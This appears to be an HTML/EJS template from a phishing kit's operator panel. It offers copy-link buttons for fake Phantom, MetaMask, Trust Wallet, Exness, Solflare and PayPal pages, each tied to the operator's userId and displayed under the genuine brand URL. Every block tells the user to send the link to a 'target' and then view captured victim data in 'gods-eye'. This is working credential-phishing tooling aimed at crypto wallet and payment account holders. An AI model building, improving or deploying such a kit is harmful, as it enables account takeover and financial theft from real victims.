<div class="content-inner">

    <!-- THIS IS FOR PHANTOM -->
    <div class="phantom">
        <div class="icon">
            <img src="/uploads/phantom.png" alt="exness" width="35%" class="exness-img">
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/phantom?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy PT URL
            </button>
            <a href="/phantom?userId=<%= userId %>">https://www.phantom.app</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>



    <!-- THIS IS FOR META MASK -->
    <div class="metamask">
        <div class="icon">
            <i class="fa-brands fa-ethereum"></i> <!-- Add an icon representing MetaMask -->
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/metamask?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy MM URL
            </button>
            <a href="/metamask?userId=<%= userId %>">https://www.metamask.io</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>



    <!-- THIS IS FOR TRUST WALLET -->
    <div class="trustwallet">
        <div class="icon">
            <img src="/uploads/trustwallet1.png" alt="exness" width="60%" class="exness-img">
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/trustwallet?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy T URL
            </button>
            <a href="/trustwallet?userId=<%= userId %>">https://www.trustwallet.com</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>



    <!-- THIS IS FOR EXNESS -->
    <div class="exness">
        <div class="icon">
            <img src="/uploads/exness.png" alt="exness" width="40%" class="exness-img">
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/exness?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy EX URL
            </button>
            <a href="/exness?userId=<%= userId %>">https://www.exness.com</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>




    <!-- THIS IS FOR SOLFLARE -->
    <div class="solflare">
        <div class="icon">
            <img src="/uploads/solflare.png" alt="exness" width="35%" class="exness-img">
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/solflare?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy SF URL
            </button>
            <a href="/solflare?userId=<%= userId %>">https://www.solflare.com</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>




    <!-- THIS IS FOR PAYPAL -->
    <div class="paypal">
        <div class="icon">
            <i class="fa-brands fa-paypal"></i>
        </div>
        <!-- Copy URL Button -->
        <div class="url">
            <button onclick="copyURL('/paypal?userId=<%= userId %>')">
                <i class="fa-solid fa-link"></i> Copy PP URL
            </button>
            <a href="/paypal?userId=<%= userId %>">https://www.paypal.com</a>
        </div>
        <p><strong>Instruction:</strong> Copy the link and send it to your target. When the target hits it, check your
            gods-eye (view-victim).</p>
    </div>








</div>
<script>
    function copyURL(route) {
        const url = window.location.origin + route; // Construct the full URL based on the route parameter
        navigator.clipboard.writeText(url).then(() => {
            alert('URL copied to clipboard!');
        }).catch(err => {
            console.error('Failed to copy URL:', err);
        });
    }
</script>